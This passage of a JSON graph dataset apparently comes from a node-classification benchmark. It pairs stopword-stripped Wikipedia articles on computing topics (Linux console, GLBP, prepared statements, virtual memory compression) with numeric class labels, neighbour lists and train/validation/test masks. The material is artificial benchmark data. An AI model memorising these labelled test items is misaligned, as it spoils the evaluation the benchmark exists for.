linux escape sequences uses console_codes man page virtual consoles allow storage multiple text buffers enabling different console programs run simultaneously interact user different contexts user point view creates illusion several independent consoles virtual console character set keyboard layout linux 2.6 introduced ability load different font virtual console kernel versions predating 2.6 change font demand text mode implementation used pc-based systems legacy cga/ega/mda/vga video card implements text-based video modes text mode kernel sends 2d array characters video card video card converts characters pixels display text buffer part vga memory describes content text screen terms code points character attributes code points text buffer font generally encoding used text terminal semantics put characters screen set glyphs screen determined current font text screen handled console.c consolemap.c drivers utility altering fonts terminal encodings called consolechars linux kernel keyboard.c driver almost complete support keyboard input keyboard layouts remains bit inconsistent interacts badly different character sets layouts loaded loadkeys utility two utilities corresponding data files packed linux console tools http //lct.sourceforge.net/ shipped many linux distributions efforts internationalization linux kernel level started early 1994 markus kuhn andries brouwer linux console capable supporting vga-style text mode kernel limited means set modes svgatextmode helps enable complex text modes standard ega vga modes fully compatible console tools conflicts dosemu svgalib display servers currently support different modes different virtual consoles microsoft windows version fully functional support console comparable feature application software win32 console linux framebuffer fbdev graphic hardware-independent abstraction layer originally implemented allow linux kernel emulate text console systems apple macintosh text-mode display offers kernel space text mode emulation platform advantage currently unmaintained svgatextmode reliance better hardware compatibility also permits overpass technical restrictions vga text modes linux framebuffer console differs vga one ways drawing characters processing keyboard events virtual consoles ’ support exactly linux serial console console implementation via serial port enabled option config_serial_console kernel configuration may used embedded systems servers direct interaction operator expected serial console allows mode access system usually slower speed due small bandwidth rs-232 serial console often used development software embedded systems sometimes left accessible via debug port console responds number control characters press escape key console also supports extended escape sequences ansi csi mode sequences dec private mode sequences extended sequences control colors visual effects like blinking underline intensity inverse video bell tone frequency duration vesa screen blanking interval aside textual blanking known way place vga adapter standby kmscon projects aims create modern user-space replacement linux console development priorities include support multi-monitor setups unicode font rendering pango xkb keyboard handling gpu opengl acceleration complaints current kernel implementation include user-interface kernel-space code poorly maintained handles keyboards badly produces bad font rendering misses mode-setting multi-head support contains multi-seat awareness limited hot-plugging handling limited vt102 compliance",
    "neighbors": [
      4616,
      3082,
      10253,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5243,
      5244,
      4734,
      11391,
      6273,
      7812,
      6797,
      4238,
      7821,
      10382,
      2195,
      2711,
      6808,
      9882,
      7325,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      8976,
      792,
      8984,
      10016,
      295,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      1408,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      10658,
      1444,
      1445,
      9637,
      935,
      4521,
      6570,
      4011,
      1456,
      2994,
      1972,
      9667,
      457,
      9693,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      6129,
      499,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 6214,
    "label": 5,
    "text": "Gateway_Load_Balancing_Protocol:gateway load balancing protocol gateway load balancing protocol glbp cisco proprietary protocol attempts overcome limitations existing redundant router protocols adding basic load balancing functionality addition able set priorities different gateway routers glbp allows weighting parameter set based weighting compared others virtual router group arp requests answered mac addresses pointing different routers thus default load balancing based traffic load rather number hosts use gateway router default glbp load balances round-robin fashion glbp elects one avg active virtual gateway group group members act backup case avg failure case two members second best avg placed standby state members placed listening state monitored using hello holdtime timers 3 10 seconds default elected avg assigns virtual mac address member glbp group including thus enabling avfs active virtual forwarders avf assumes responsibility forwarding packets sent virtual mac address could four avfs time default glbp routers use local multicast address 224.0.0.102 send hello packets peers every 3 seconds udp 3222 source destination cisco implemented ipv6 support glbp ios release 12.2 33 sxi",
    "neighbors": [
      841,
      8073,
      6834,
      7411,
      5437,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 6215,
    "label": 9,
    "text": "State_space_enumeration:state space enumeration computer science state space enumeration methods consider reachable program state determine whether program satisfies given property programs increase size complexity state space grows exponentially state space used methods reduced maintaining parts state space relevant analysis however use state memory reduction techniques makes runtime major limiting factor",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6216,
    "label": 3,
    "text": "MirrorLink:mirrorlink mirrorlink device interoperability standard offers integration smartphone car infotainment system mirrorlink transforms smartphones automotive application platforms apps hosted run smartphone drivers passengers interact steering wheel controls dashboard buttons touch screens car in-vehicle infotainment ivi system mirrorlink utilizes set well-established non-proprietary technologies ip usb wi-fi bluetooth real-time protocol rtp audio universal plug play upnp addition mirrorlink uses virtual network computing vnc baseline protocol display user interface smartphone applications infotainment system screens communicate user input back mobile device mirrorlink started research project researcher jörg brakensiek nokia research center palo alto us took results nobounds project—invented researcher bernd steinke nokia research center bochum germany—and applied automotive domain initial approach applied bernd steinke contained three specialised sub-protocols optimal power efficiency 2d 3d media support 2d graphics composition via x11 mirroring needed requirements chosen source device nokia n800 mobile linux device desire speed demo availability show mirroring use cases opengl es used fast 3d graphics alpha based porter-duff compositing shine-through 2d effects make future relevant approach available limited n800 mesa 3d used local playback high definition media streaming implemented via openmax rtp timed sideband control allow synchronous displayed streaming original video file without transcoding initial implementations remoted gui games media content nokia n800 later n810 mobile linux device demonstration time expected capabilities mobile devices widely reported parallel member ce4a company seen initial results contacted nokia collaboration nokia ce4a started first ideas published demonstrated using nokia n810 internet tablet ieee ccnc 2009 conference together two researchers raja bose keun-young park nokia research center palo alto close collaboration consumer electronics automotive ce4a group german car manufacturer original terminal mode concept created name terminal mode originated name expert group within ce4a created positioning paper nokia together magneti marelli publicly demonstrated first terminal mode concept navteq connection event conjunction frankfurt international auto show iaa september 2009 first car integration shown geneva auto show march 2010 using nokia n97 prototype implementation terminal mode integrated valmet concept car draft 0.9 specification version released march 2010 july 2010 terminal mode presented integrated vw passat mobilebeat 2010 first real live demonstration seen september 2010 shortly terminal mode specification became public 6 october 2010 early adopters included continental alpine clarion collaboration nokia ce4a terminal mode led formation car connectivity consortium car connectivity consortium brought together major players automotive mobile device industries including large number tier-i suppliers even network providers 12 september 2011 terminal mode renamed mirrorlink became commercial trademark owned car connectivity consortium may 2012 car connectivity consortium 56 members included almost major automobile mobile device manufacturers world car connectivity consortium made various auto electronic manufacturers joined together establish industry standard certifying apps devices safe useful drivers called mirrorlink joint effort car manufacturers phone makers aimed developing open standards define operations smartphones linked cars unique element mirrorlink ability show smartphone interface variety mobile os platforms audio head-unit display mirrorlink currently works symbian phones nokia belle phones s60v5 phones many manufacturers samsung galaxy series android lollipop 5.0 sony xperia z series android phones sony audio launched two audio head units 2012 q2 mirrorlink compliant phone maker motorola audio head unit maker alpine also members group supporting mirrorlink alpine offer mirrorlink based aftermarket systems us 2013 vw offer mirrorlink based infotainment systems starting 2nd generation mib infotainment hardware starting 2014 new polo india maruti suzuki ciaz scross ertiga baleno hatchback vitara brezza car models also infotainment system mirrorlink feature",
    "neighbors": [
      5472,
      1537,
      5019,
      9381,
      199,
      7983,
      5620,
      7700,
      1083
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6217,
    "label": 7,
    "text": "Emergent_Payments:emergent payments emergent payments online payments company focusing offering local payment methods global markets digital companies company based palo alto california previously company named live gamer june 2015 changed name emergent payments indicate shift gaming e-commerce broader market digital payments company also sold microtransactions engine elements focus fully online payments firm originated 2008 live gamer new york pay+ emergent payments saas-based payments platform service offers 200 payment methods 180 countries",
    "neighbors": [
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 6218,
    "label": 2,
    "text": "TUNIS:tunis tunis toronto university system unix-like operating system developed university toronto early 1980s tunis portable operating system compatible unix v7 completely redesigned kernel written concurrent euclid programs ran unix v7 could run tunis modification tunis designed teaching intended provide model design well-structured highly portable easily understood unix-like operating systems made extensive use concurrent euclid modules isolate machine dependencies provide clean internal structure information hiding concurrent euclid built-in processes synchronization features make easy understand maintain tunis targeted pdp-11 motorola 6809 68000 national semiconductor 32016 architectures supported distribution across multiple cpus using concurrent euclid synchronization features",
    "neighbors": [
      2179,
      6787,
      6412,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      8262,
      6369,
      9444,
      5492,
      2424,
      633,
      11132
    ],
    "mask": "Test"
  },
  {
    "node_id": 6219,
    "label": 1,
    "text": "Prepared_statement:prepared statement database management systems dbms prepared statement parameterized statement feature used execute similar database statements repeatedly high efficiency typically used sql statements queries updates prepared statement takes form template certain constant values substituted execution typical workflow using prepared statement follows compared executing statements directly prepared statements offer two main advantages hand query executed server-side prepared statements slower additional round-trip server implementation limitations may also lead performance penalties example versions mysql cache results prepared queries stored procedure also precompiled stored server later execution similar advantages unlike stored procedure prepared statement normally written procedural language use modify variables use control flow structures relying instead declarative database query language due simplicity client-side emulation prepared statements portable across vendors major dbmss including mysql oracle db2 microsoft sql server postgresql widely support prepared statements prepared statements normally executed non-sql binary protocol efficiency protection sql injection dbmss mysql prepared statements also available using sql syntax debugging purposes number programming languages support prepared statements standard libraries emulate client side even underlying dbms support including java jdbc perl dbi php pdo python db-api client-side emulation faster queries executed reducing number round trips server usually slower queries executed many times resists sql injection attacks equally effectively many types sql injection attacks eliminated disabling literals effectively requiring use prepared statements h2 supports feature example uses java jdbc java codice_1 provides setters codice_2 etc major built-in data types example uses php pdo example uses perl dbi example uses c ado.net ado.net codice_3 accept type codice_4 parameter codice_5 type conversion occurs automatically note use named parameters i.e codice_6 rather codice_7—this allows use parameter multiple times arbitrary order within query command text however addwithvalue method used variable length data types like varchar nvarchar .net assumes length parameter length given value rather getting actual length database via reflection consequence different query plan compiled stored different length general maximum number duplicate plans product lengths variable length columns specified database reason important use standard add method variable length columns paramlength length specified database since standard add method needs used variable length data types good habit use parameter types example uses python db-api example uses direct sql fourth generation language like edeveloper unipaas magic xpa magic software enterprises purebasic since v5.40 lts manage 7 types link following commands setdatabaseblob setdatabasedouble setdatabasefloat setdatabaselong setdatabasenull setdatabasequad setdatabasestring 2 different methods depending type database sqlite odbc mariadb/mysql use postgresql use 1 2 3 ...",
    "neighbors": [
      899,
      8644,
      10340,
      8582,
      8554,
      1579,
      6636,
      5677,
      7022,
      9263,
      2544,
      10413,
      8539,
      11030,
      5403
    ],
    "mask": "Test"
  },
  {
    "node_id": 6220,
    "label": 4,
    "text": "Reliance_authentication:reliance authentication reliance authentication part trust-based identity attribution process whereby second entity relies upon authentication processes put place first entity second entity creates element unique specific purpose retrieved accessed authentication processes first entity first met reliance authentication achieved one tokens random characteristics transmitted secure area controlled first entity secure area accessible person authorised use account secure area may online banking portal telephone banking system mobile banking application token often form single plural debit credits financial account numerical values debit credits form token whose numeric value confirmed account holder token retrieved cardholder accessing secure area first entity secure area protected accessible satisfying first entity authentication means case financial services authentication access secure area normally includes multi-factor sepa would likely involve strong authentication transmission requirement retrieve token adds challenge response factor overall authentication process considered point view second party generates transmits token token may generated second party dynamically thus act one-time password reliance authentication method particular application financial instruments credit cards e-mandate direct debit transactions whereby person may instigate transaction financial instrument however financial instrument verified belonging person person confirms value token reliance method often incorporates out-of-band response means tokens retrieved secure area reliance authentication uses multi-step inputs ensure user fraud everyone uses even aware examples include introduction strong customer authentication online payment transactions within european union links verified person account person identified accordance statutory requirements prior account opened reliance authentication makes use pre-existing accounts piggyback services upon accounts providing original source 'reliable concept reliability legal one derived various anti money laundering aml counter-terrorism funding ctf legislation usa eu28 australia singapore new zealand second parties may place reliance customer due diligence process first party first party say financial institution australian legislation 'reliance based upon section 38 anti-money laundering counter-terrorism financing act 2006 cth european commission proposal directive european parliament council prevention use financial system purpose money laundering terrorist financing reliance based upon article 11 1 reliance uk specific meaning relates process regulation 17 money laundering regulations 2007 reliance purpose aml reliance authentication although use similar concepts federal financial institutions examination council united states america ffiec issued authentication internet banking environment dated october 2005 reliance authentication outlined per final paragraph page 14 advantages reliance authentication methods disadvantages reliance authentication methods",
    "neighbors": [
      11619,
      4965,
      519,
      11244,
      6064,
      5433
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6221,
    "label": 2,
    "text": "Virtual_memory_compression:virtual memory compression virtual memory compression also referred ram compression memory compression memory management technique utilizes data compression reduce size number paging requests auxiliary storage virtual memory compression system paging requests compressed stored physical memory usually random-access memory ram sent compressed auxiliary storage hard disk drive hdd solid-state drive ssd cases virtual memory range whose contents compressed paging request marked inaccessible attempts access compressed pages trigger page faults reversal process retrieval auxiliary storage decompression footprint data paged reduced compression process first instance freed ram returned available physical memory pool compressed portion kept ram second instance compressed data sent auxiliary storage resulting i/o operation smaller therefore takes less time implementations including zswap zram helix software company ’ hurricane entire process implemented software systems ibm mxt compression process occurs dedicated processor handles transfers local cache ram virtual memory compression distinct garbage collection gc systems remove unused memory blocks cases consolidate used memory regions reducing fragmentation improving efficiency virtual memory compression also distinct context switching systems connectix ram doubler though also online compression apple os 7.1 inactive processes suspended compressed whole reducing i/o activity caused paging requests virtual memory compression produce overall performance improvements degree performance improvement depends variety factors including availability compression co-processors spare bandwidth cpu speed i/o channel speed physical memory compressibility physical memory contents multi-core multithreaded cpus benchmarks show performance improvements 50 situations embedded devices auxiliary storage limited non-existent cases virtual memory compression allow virtual memory system operate otherwise virtual memory would disabled allows system run certain software would otherwise unable operate environment virtual memory flash memory certain endurance limitations maximum number erase cycles undergo low 100 erase cycles systems flash memory used auxiliary storage system implementing virtual memory compression reduce total quantity data written auxiliary storage improving system reliability one primary issues degree contents physical memory compressed real-world loads program code much data held physical memory often highly compressible since efficient programming techniques data architectures designed automatically eliminate redundancy data sets various studies show typical data compression ratios ranging 2:1 2.5:1 program data similar typically achieval compression ratios disk compression order virtual memory compression provide measurable performance improvements throughput virtual memory system must improved compared uncompressed equivalent thus additional amount processing introduced compression must increase overall latency however i/o-bound systems applications highly compressible data sets gains substantial physical memory used compression system reduces amount physical memory available processes system runs may result increased paging activity reduced overall effectiveness virtual memory compression relationship paging activity available physical memory roughly exponential meaning reducing amount physical memory available system processes results exponential increase paging activity circumstances amount free physical memory low paging fairly prevalent performance gains provided compression system compared paging directly auxiliary storage may offset increased page fault rate leads thrashing degraded system performance opposite state enough physical memory available paging activity low compression may impact performance enough noticeable middle ground two circumstanceslow ram high paging activity plenty ram low paging activityis virtual memory compression may useful however compressible program data pronounced performance improvements less physical memory needed hold compressed data example order maximize use compressed pages cache helix software company hurricane 2.0 provides user-configurable compression rejection threshold compressing first 256 512 bytes 4 kib page virtual memory compression system determines whether configured compression level threshold achieved particular page achievable rest page would compressed retained compressed cache otherwise page would sent auxiliary storage normal paging system default setting threshold 8:1 compression ratio hardware implementations technology also relies price differentials various components system example difference cost ram cost processor dedicated compression relative price/performance differences various components tend vary time example addition compression co-processor may minimal impact cost cpu typical virtual memory implementation paging happens least recently used basis potentially causing compression algorithm use cpu cycles dealing lowest priority data furthermore program code usually read-only therefore never paged-out instead code simply discarded re-loaded program ’ auxiliary storage file needed case bar compression higher since i/o cycle attempting eliminate much shorter particularly flash memory devices virtual memory compression gone favor technology price speed ram external storage plummeted due moore law improved ram interfaces ddr3 thus reducing need virtual memory compression multi-core processors server farms mobile technology together advent flash based systems make virtual memory compression attractive paul r. wilson proposed compressed caching virtual memory pages 1990 paper circulated acm oopsla/ecoop '90 workshop garbage collection issues strategies heap management memory hierarchies appearing acm sigplan notices january 1991 helix software company pioneered virtual memory compression 1992 filing patent application process october year 1994 1995 helix refined process using test-compression secondary memory caches video cards devices however helix release product incorporating virtual memory compression july 1996 release hurricane 2.0 used stac electronics lempel–ziv–stac compression algorithm also used off-screen video ram compression buffer gain performance benefits 1995 ram cost nearly 50 per megabyte microsoft windows 95 listed minimum requirement 4 mb ram due high ram requirement several programs released claimed use compression technology gain “ memory ” notorious softram program syncronys softcorp softram revealed “ placebo software ” include compression technology products including hurricane magnaram included virtual memory compression implemented run-length encoding poor results giving technology negative reputation 8 april 1997 issue pc magazine published comprehensive test performance enhancement claims several software virtual memory compression tools testing pc magazine found minimal 5 overall performance improvement use hurricane none packages however tests run intel pentium systems single core single threaded thus compression directly impacted system activity 1996 ibm began experimenting compression 2000 ibm announced memory expansion technology mxt mxt stand-alone chip acted cpu cache cpu memory controller mxt integrated compression engine compressed data heading to/from physical memory subsequent testing technology intel showed 5–20 overall system performance improvement similar results obtained pc magazine hurricane",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      541,
      4637,
      3615,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      2625,
      6730,
      86,
      10333,
      97,
      2152,
      8296,
      8298,
      7796,
      7285,
      9335,
      2168,
      634,
      1147,
      3197,
      1150,
      2179,
      10883,
      4747,
      3725,
      6797,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      8388,
      1736,
      9932,
      5840,
      6868,
      7382,
      8410,
      1247,
      1253,
      7403,
      5363,
      2811,
      3323,
      2304,
      10499,
      1804,
      273,
      9490,
      11539,
      3871,
      10016,
      2339,
      2345,
      814,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      4424,
      2383,
      5457,
      11601,
      10590,
      8545,
      8551,
      5492,
      8573,
      7039,
      394,
      3978,
      5008,
      7057,
      11667,
      8092,
      1954,
      421,
      11184,
      4017,
      3512,
      6075,
      6078,
      9151,
      1474,
      8136,
      5074,
      5080,
      10734,
      6128,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 6222,
    "label": 4,
    "text": "OneSpan:onespan onespan formerly vasco data security international inc. publicly traded cybersecurity technology company based chicago illinois offices montreal brussels zurich company offers cloud-based open architected anti-fraud platform historically known multi-factor authentication electronic signature software founded t. kendall hunt 1991 held initial public offering ipo january 2000 onespan member fido alliance board 1984 t. kendall hunt founded vasco corp. consulting software services company corporate governmental agencies company acquired thumbscan inc. claimed first fingerprint reader device computer 1991 renamed vasco data security international inc. 1993 expanded offerings include data security vasco incorporated 1997 held initial public offering january 2000 vasco started developing digipass technology early 2000s company marketed technology internationally belgium 2009 vasco announced digipass two-factor authentication available app store iphone ipod touch forbes recognized vasco list america fastest-growing tech companies year january 2011 vasco acquired diginotar dutch certificate authority june 2011 diginotar hacked started issuing false security certificates news broke confidence shattered issued certificates cancelled company went bankrupt company established international headquarters dubai silicon oasis 2012 vasco announced would lower emea channel entry vars time became member fast identity online fido alliance june 2014 later recognized gartner magic quadrant user authentication october 2015 vasco acquired silanis technology inc. canadian document e-signature company 113 million early 2016 company cloud electronic signature software esignlive updated include integration salesforce vasco announced face recognition authentification feature digipass may 2016 company partnerships financial institutions including hsbc bank usa fedict rabobank arab bank riyadh bank may 30 2018 vasco changed name onespan trades ticker symbol ospn may 2018 company acquired dealflo uk canada-based financial agreement automation software company gbp 41 million solutions delivered onespan open cloud-based trusted identity tid platform",
    "neighbors": [
      1346,
      9732,
      9063,
      5918,
      11248,
      1496,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6223,
    "label": 0,
    "text": "Trigram:trigram trigrams special case n -gram n 3 often used natural language processing performing statistical analysis texts cryptography control use ciphers codes context important varying analysis rankings percentages easily derived drawing different sample sizes different authors different document types poetry science-fiction technology documentation writing levels stories children versus adults military orders recipes typical cryptanalytic frequency analysis finds 16 common character-level trigrams english encrypted messages sent telegraph often omit punctuation spaces cryptographic frequency analysis messages includes trigrams straddle word boundaries causes trigrams edt occur frequently even though may never occur one word messages sentence quick red fox jumps lazy brown dog following word level trigrams word-level trigram quick red following character-level trigrams underscore marks space",
    "neighbors": [
      5122,
      2440,
      2059,
      6798,
      9617,
      11538,
      1044,
      1941,
      5399,
      538,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      9798,
      3533,
      5197,
      8538,
      3808,
      5857,
      7780,
      7918,
      8046,
      8688,
      10231,
      8440,
      7164,
      8318
    ],
    "mask": "Test"
  },
  {
    "node_id": 6224,
    "label": 4,
    "text": "Federal_Desktop_Core_Configuration:federal desktop core configuration federal desktop core configuration list security settings recommended national institute standards technology general-purpose microcomputers connected directly network united states government agency fdcc list agreed upon microsoft windows operating system common core system functions applications files services changed configuration around framework secure security-reliable ms windows operating system created standards made mandatory every federal government computer effective feb 1 2008 wanted connect federal office computer network system meet exceed fdcc standard denied access fdcc applied windows xp vista desktop laptop computers replaced united states government configuration baseline usgcb included settings windows 7 red hat enterprise linux 5 windows 7 nist changed naming convention us government computer baseline usgcb ver 2.0 addition un-classifying general windows settings guide nist also publishes guides specifically windows firewall internet explorer guide vista-energy example created capture settings adhere energy conservation policies 20 march 2007 office management budget issued memorandum instructing united states government agencies develop plans using microsoft windows xp vista security configurations united states air force common security configurations windows xp proposed early model standards could developed fdcc baseline developed maintained national institute standards technology collaboration omb dhs doi disa nsa usaf microsoft input public comment applies windows xp professional vista systems only—these security policies tested according nist work windows 9 x /me/nt/2000 windows server 2003 major version 1.1 released 31 october 2008 new changed settings expanded scap reporting options previous versions standard applicable general-purpose workstations laptops end users windows xp vista systems use servers exempt standard also exempt embedded computers special purpose systems defined specialized scientific medical process control experimental systems though still recommends fdcc security configuration considered feasible appropriate fdcc settings generally speaking block open connections operating systems disables functions disables rarely used applications soho environment disables unnecessary services changes permissions items changes way log files collected recorded affects group policy object gpo settings alters entries windows system registry infoweek introduced fdcc mostly administrators engineers article titled ‘ feds ’ allow ’ written kelly jackson higgins darkreading.com published february 4 2008 due complexity guidelines response initially slow implementation took time settings internally researched government enterprise implementation techs nist nsa published guidelines hundreds-of-page texts introduced called scap files applications see wikipedia scap page windows platform built easy interoperability networking therefore left opportunities within operating systems types auto- semi-automatic connections computers ’ flaws programming mistakes purposefully built way example found looking windows remote connection program enabled default typical windows operating system installation fdcc/usgcb configuration instance reverses setting manually re-enable allow remote connections organizations required document fdcc compliance using scap tools 600+ settings average fdcc/usgcb document – usable average small home office soho computer instance released 20 june 2008 fdcc major version 1.0 specifies 674 settings example wireless interfaces disabled recognition recommended settings practical every system exceptions authorized enterprise wireless networks made documented fdcc deviation report strict implementation recommended settings known cause usability issues nist publishes list known issues found nowiki https //usgcb.nist.gov/usgcb/microsoft_content.html /nowiki third-party software vendors emerged claim tested settings soho environment however time general public still remains relatively unaware fdcc usgcb security settings developed put forward nist",
    "neighbors": [
      635,
      5780,
      2558,
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6225,
    "label": 1,
    "text": "Text_Database_and_Dictionary_of_Classic_Mayan:text database dictionary classic mayan project text database dictionary classic mayan abbr twkm promotes research writing language pre-hispanic maya culture housed faculty arts university bonn established funding north rhine-westphalian academy sciences humanities arts project projected run-time fifteen years directed nikolai grube department anthropology americas university bonn goal project conduct computer-based studies extant maya hieroglyphic texts epigraphic cultural-historical standpoint produce publish database comprehensive dictionary classic mayan language text database well dictionary compiled conclusion project assembled based known texts pre-hispanic maya culture texts produced used approximately third century b.c a.d. 1500 region today includes parts countries mexico guatemala belize honduras thousands hieroglyphic inscriptions monuments ceramics daily objects survived present offer insight language ’ vocabulary structure project ’ database dictionary digitally represent original spellings using logo-syllabic maya hieroglyphs well transcription transliteration roman alphabet data additionally annotated various epigraphic analyses translations object-specific information twkm employ digital technologies order compile make available data metadata well publish project ’ research results project thereby methodologically positions field digital humanities project conducted cooperation project partners research association ehumanities textgrid well university regional library bonn ulb working environment currently construction data metadata compiled annotated realized thetextgrid laboratory software virtual research environment component software textgrid repository make data authorized publication freely available online ensure long-term storage tools data compilation annotation attained modularly constructed extended textgrid lab thereby provide necessary materials facilitating research team ’ typical epigraphic workflow workflow usually begins documenting texts objects preserved compiling descriptive data continues various levels epigraphic linguistic analysis concludes best case scenario translation analyzed inscription corresponding publication cooperation ulb selected data additionally made available project ’ virtual inscription archive present online digital collections ulb hieroglyphic inscriptions selected published data repository including image brief information texts objects written epigraphic analysis translation one project ’ goals produce dictionary classic mayan digital print form towards end project run-time additionally database corpus inscriptions including translations epigraphic analyses made freely available online database furthermore provide ontology-like link contextual object data inscriptions thereby allowing cultural-historical arrangement contents within periods pre-hispanic maya culture contents database additionally linked citations relevant literature result database also make freely available scientific community interested parties bibliography representing research history base knowledge concerning ancient maya culture script addition classic maya script temporally defined stages language development gathered documented comprehensive language corpus aid information gathered project collaboration project participants corpus data used together aid various comparable analyses also computational linguistic methods inference-based methods confirm readings hieroglyphs currently partially confirmed eventually completely decipher classic maya script",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6226,
    "label": 2,
    "text": "KeyRus:keyrus keyrus dos-based tsr device driver keyboard display written donetsk student hacker 1989 widely distributed ussr outside country free charge last version keyrus released 1994 long gurtyak suddenly died keyrus distributed primarily via electronic bulletin boards nikolai bezroukov softpanorama electronic magazine loaded fonts ega/vga supported changes keyboard layout initially could change russian latin keyboard layouts later became configurable distribution included layout font editors later versions keyrus utilized original font compression technique bitmaps stored memory packed unpacked loading graphics adapter allowed keyrus occupy minimum limited dos memory space",
    "neighbors": [
      6226,
      477,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 6227,
    "label": 2,
    "text": "APT-RPM:apt-rpm apt-rpm version advanced packaging tool modified work rpm package manager originally ported rpm alfredo kojima developed improved gustavo niemeyer working conectiva linux distribution time march 2005 maintainer program gustavo niemeyer announced would continue developing would instead focus smart package manager planned successor apt-rpm march 2006 development picked panu matilainen red hat new home introducing basic multilib functionality support common repository metadata distributions using apt-rpm package management",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      2239,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      7293,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      4841,
      6119,
      8554,
      9063,
      9324,
      9455,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6228,
    "label": 9,
    "text": "ParaSail_(programming_language):parasail programming language parallel specification implementation language parasail object-oriented parallel programming language design ongoing implementation described blog official website parasail uses pointer-free programming model objects grow shrink value semantics used assignment global garbage collected heap instead region-based memory management used throughout types recursive long recursive components declared optional global variables parameter aliasing subexpressions expression evaluated parallel assertions preconditions postconditions class invariants etc. part standard syntax using hoare-like notation possible race conditions detected compile time initial design parasail began september 2009 s. tucker taft interpreter using parasail virtual machine llvm-based parasail compiler available work stealing used scheduling parasail light-weight threads latest version downloaded parasail website parasail goals syntax parasail similar modula class-and-interface-based object-oriented programming model similar java c recently parallel constructs parasail adapted syntaxes produce java-like python-like ada-like parallel languages dubbed respectively javallel parython sparkel named ada subset spark based compilers interpreters languages included parasail implementation following hello world program parasail func hello_world var io end func hello_world following interface basic map module interface bmap key_type ordered element_type assignable » end interface bmap possible implementation map module using binary tree class bmap end class bmap simple test program bmap module import psl :core :random import bmap func test_bmap num univ_integer seed univ_integer end func test_bmap articles parasail appeared various forums",
    "neighbors": [
      2304,
      9345,
      3462,
      8582,
      9224,
      6797,
      9871,
      10387,
      10649,
      1435,
      155,
      3613,
      7326,
      8990,
      1952,
      9245,
      10013,
      3876,
      6184,
      4777,
      428,
      5677,
      7983,
      823,
      6074,
      6718,
      8644,
      8262,
      5833,
      8524,
      7889,
      5074,
      11219,
      2519,
      7386,
      477,
      6502,
      10470,
      11625,
      8554,
      10991,
      9714,
      499,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6229,
    "label": 5,
    "text": "WHOIS++:whois++ whois++ protocol distributed directory system originally designed provide white pages search mechanism find humans could actually used arbitrary information retrieval tasks developed early 1990s bunyip information systems documented ietf whois++ devised extension pre-existing whois system whois early networked directory service originally maintained sri international defense data network whois protocol still widely used allow domain ownership records internet easily queried whois++ attempted address short comings original whois protocol become apparent years supported multiple languages character sets help i18n issues advanced query syntax ability generate forward knowledge form 'centroid data structures could used route queries one server another protocol designed backward compatible older whois standard whois++ clients could still extract meaningful information already deployed whois servers whilst whois++ white pages directory service never really took compared competitors x.500 gain notable amount use united kingdom underlying search retrieval protocol number subject based gateways funded part jisc electronic library programme achieved using software called roads provided whois++ base index servers cgi based web interfaces whois++ clients use centroids provide forward knowledge query routing allowed subject gateway provide resources academic users database also point jisc funded subject gateways might useful information whois++ protocol designated ietf historic protocol longer deployed new systems developed",
    "neighbors": [
      8204,
      2485,
      3191,
      10238,
      3967
    ],
    "mask": "Train"
  },
  {
    "node_id": 6230,
    "label": 3,
    "text": "European_Committee_for_Interoperable_Systems:european committee interoperable systems european committee interoperable systems ecis international non-profit association founded 1989 order promote interoperability market conditions information communications technology ict sector allowing vigorous competition merits diversity consumer choice ecis represented members many issues related interoperability competition european national international bodies including european union institutions world intellectual property organization wipo ecis members include large smaller information communications technology hardware software providers adobe systems corel corporation ibm linspire nokia opera software oracle corporation realnetworks red hat sun microsystems past years ecis actively involved european commission ’ antitrust condemnation microsoft upheld european court first instance september 2007 ziff-davis eweek comments complaints microsoft include",
    "neighbors": [
      9665,
      1347,
      2948,
      9455,
      3323,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 6231,
    "label": 5,
